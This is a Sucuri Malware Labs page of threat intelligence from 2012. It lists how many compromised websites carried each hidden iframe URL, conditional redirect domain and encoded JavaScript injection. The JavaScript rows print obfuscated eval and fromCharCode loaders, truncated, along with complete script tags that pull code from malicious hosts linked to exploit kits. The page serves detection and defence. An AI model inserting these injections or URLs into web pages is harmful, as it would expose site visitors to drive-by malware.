Sucuri Malware Labs

Sucuri on Twitter Sucuri on Facebook Sucuri on LinkedIn

Historic malware entries for 2012-08-06Home  |  Notes  |  Malware data  |  Signatures  |  Tools  |  About

      Archived data:   Latest   |   2013-05-19   |   2013-05-15   |   2013-05-14   |   2013-05-13   |   2013-05-12   |   2013-05-07   |   2013-05-02   |   2013-05-01   |   More days

We separate the data in three categories: Iframes, redirectiors and javascript. For each one you can click on the domain for more information, IP addresses and details on the malware.

Hidden iframes

Latest hidden iframes our scanner have identified on compromised web sites.

# of sites infectedTypeMalware / Domains
176iframehttp://okaycontroller.info:8582/SDGwYC?SUmxv=18
73iframehttp://interviewerbacklit.org/news.php?id=e6f6402caf60df3a
40iframehttp://smuss.net/redirect.php
32iframehttp://ineed.co.nz/adverts/media.php
21iframehttp://unlinedrj.org/news.php?id=e6f6402caf60df3a
21iframehttp://playart.org/sites/stats.php
18iframehttp://arvaglobal.com/vwop.php
16iframehttp://hazelwave.ru/in.cgi?16
13iframehttp://whitecada.ru/in.cgi?16
11iframehttp://shopicardcom1.ns1.name/main.php?page=0a5dfa49b8990c98
9iframehttp://competechart.ru/in.cgi?16
8iframehttp://blackium.ru/in.cgi?16
7iframehttp://www.songsmusic.in/searchbar.html
6iframehttp://methuenedge.com/stats.php
5iframehttp://niu-sae.com/stats.php
4iframehttp://simat.co.th/counter.php
3iframehttp://tuneupyourday.com/css-kdg.php
3iframehttp://torvaldscallthat.info/in.cgi?16
3iframehttp://grabmale-junkert.de/c.php
3iframehttp://bioperm12.org/20/go.php?sid=1
2iframehttp://zumobtr.ru/gate.php?f=1036767
2iframehttp://stds5.check-it-out.nl/in.cgi?13
2iframehttp://gingertide.ru/in.cgi?15
2iframehttp://buzzcluster.ru/in.cgi?16
1iframehttp://purplebeetle.ru/in.cgi?16
1iframehttp://kulycap.fr/63464443.html
1iframehttp://jsbondgroup.com/60034443.html
1iframehttp://insulinpumpstuff.com/14094443.html
1iframehttp://greenpillar.ru/in.cgi?16
1iframehttp://filmblips.com/70524443.html
1iframehttp://divorzioonline.com/49964443.html
1iframehttp://deepers.co.kr/28054443.html
1iframehttp://coderoute.ru/in.cgi?16
Limited view (40 rows)... Only the top entries being displayed.

Conditional redirections

Conditional redirections we have detected (based on user agents or referers).

# of sites infectedTypeMalware / Domains
114redirectionshttp://online-fitnes.ru/milli?5
95redirectionshttp://onlinefitnes.ru/milli?5
90redirectionshttp://fitnes-global.ru/sorento?5
71redirectionshttp://fitnes2014.ru/milli?5
61redirectionshttp://topfitnes.ru/iskustve?5
50redirectionshttp://2013-fitnes.ru/milli?5
48redirectionshttp://2013fitnes.ru/milli?5
36redirectionshttp://colceadem.ru/infinity?8
34redirectionshttp://fitnes-2014.ru/milli?5
32redirectionshttp://fitnes-online.ru/milli?5
30redirectionshttp://2014-fitnes.ru/milli?5
29redirectionshttp://centerfitnes.ru/sorento?5
25redirectionshttp://2014fitnes.ru/milli?5
24redirectionshttp://reltimes2013.ru/tujur?11
23redirectionshttp://online-fitnes.ru/milli?5
23redirectionshttp://1-reltime.ru/martinez?6
21redirectionshttp://fitnes-global.ru/sorento?5
20redirectionshttp://onlinefitnes.ru/milli?5
20redirectionshttp://nashifitnes.ru/nonalco?5
20redirectionshttp://fitnes-top.ru/iskustve?5
17redirectionshttp://2012-verygoods.ru/in.cgi?11
17redirectionshttp://2011-supas.ru/blackmuscat?4
15redirectionshttp://fitnes2014.ru/milli?5
14redirectionshttp://fitnestop.ru/iskustve?5
13redirectionshttp://topfitnes.ru/iskustve?5
13redirectionshttp://pasla-ghwoo.ru/rqpgfap?8
12redirectionshttp://mediciron.ru/
11redirectionshttp://miamiheattickets.com/http.php
11redirectionshttp://2013fitnes.ru/milli?5
11redirectionshttp://2013-fitnes.ru/milli?5
10redirectionshttp://24medi.ru/timetose?19
8redirectionshttp://fitnes-2014.ru/milli?5
7redirectionshttp://fitnes-online.ru/milli?5
6redirectionshttp://sanagater.ru/easy?9
6redirectionshttp://freshinter.ru/in.cgi?8
6redirectionshttp://colceadem.ru/infinity?8
6redirectionshttp://centerfitnes.ru/sorento?5
6redirectionshttp://2014-fitnes.ru/milli?5
5redirectionshttp://stds5.check-it-out.nl/in.cgi?13
5redirectionshttp://nasha-fitnes.ru/nonalco?5
Limited view (40 rows)... Only the top entries being displayed.

Encoded javascript

Encoded javascript (redirecting to blackhole and other exploit kits) or to build a remote call.

# of sites infectedTypeMalware / Domains
35javascript<script>try{1-prototype;}catch(bsdtwbd){q=412;} if(020==0x10){f=[1,0,95,94,23,30,92,102,89,109,...
32javascript<script src="http://tartis78tscolla.rr.nu/sl.php"></script>
32javascript<script src="http://senior78custome.rr.nu/sl.php?v=1"></script>
30javascript<script src="http://andsto57cksstar.rr.nu/sl.php"></script>
27javascript<script src="http://xinthesidersdown.com/sl.php"></script>
25javascript<script type="text/javascript">document.write('<iframe src="http://ineed.co.nz/adverts/media.ph...
23javascript<script>i=0;if(window["document"])try{grbregd=prototype;}catch(z){h="Code";f=[9,18,315,102,64,1...
22javascript<scriptlanguage=JavaScript>document.write(<iframesrc=http://frankwsdoms.in/showads.php?2&seoref...
22javascript<script>if(window.document)aa=(Number+[].unshift).substr(0,4);aaa=([].sort+[]['sort']).substr(0...
18javascript<script>try{document.asd.removeChild({})}catch(q){ss="";s=String;}ddd=new Date();d2=new Date(dd...
18javascript<script language=javascript>status=location;document.write('<iframe src="http://arvaglobal.com/...
16javascript<script src="http://reque83ntlyin.rr.nu/sl.php?v=1"></script>
14javascript<script language="javascript" src="http://www.777seo.com/pop.php?username=empixcrew&max=5"></sc...
10javascript<script src="http://reque83ntlyin.rr.nu/sl.php"></script>
10javascript<script language="JavaScript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt...
7javascript<script src="http://globalpoweringgathering.com/nl.php?p=1"></script>
6javascript<script type="text/javascript" src="http://asjo.com.br/js/Check.php"></script>
6javascript<script src="http://lasimp04risoned.rr.nu/sl.php"></script><!--AFMC">"></title><script src="htt...
6javascript<script>eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,108,106,115,40,41,123,116,11...
6javascript<script>d=Date;d=new d();h=-parseInt('012')/5;if(window.document)try{Boolean(true).prototype.a}...
5javascript<script>try{n^=window["ev"+"al"];}catch(zxc){e=eval;n="143..120..1122..1404..1210..1188..1276.....
5javascript<script src="http://tartis78tscolla.rr.nu/sl.php?v=1"></script>
5javascript<script src="http://senior78custome.rr.nu/sl.php"></script>
4javascript<script src="http://eighbo02rsbarr.rr.nu/sl.php"></script>
3javascript<script type="text/javascript" src="http://aeg.com.br/us/Check.php"></script>
2javascript<script src="http://yea58rlay.rr.nu/pmg.php?d=x"></script>
2javascript<script>if(window["document"])try{prototype;}catch(brebr){st=String;zz='al';zz='zv'.substr(123-...
2javascript<script>if(window.document)aa=(Number+'evweds').substr(0,4);aaa=(Date.UTC+124).substr(0,4);if(a...
1javascript<script type="text/javascript" src="http://eumemo.com.br/010706.php"></script>
1javascript<script type="text/javascript" src="http://arbtoon.com/mltools.js"></script>
1javascript<script type="text/javascript">document.write(String.fromCharCode(60,105,102,114,97,109,101,32,...
1javascript<script>try{q=document.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;zz='a...
1javascript<script>try{1-prototype;}catch(bsdtwbd){q=412;} if(020==0x10){f=[1,0,95,94,23,30,92,102,89,109,...
1javascript<script src=http://pomati.it/logs/java_zoom3.php ></script>
1javascript<script src=http://nexsales.com/v1/Contact_us.php ></script>
1javascript<script src="http://ids54enc.rr.nu/pmg.php?d=x"></script>
1javascript<script src="http://escale25sdesign.rr.nu/pmg.php?d=x"></script>
1javascript<script src="http://andsto57cksstar.rr.nu/sl.php?v=1"></script>
Limited view (40 rows)... Only the top entries being displayed.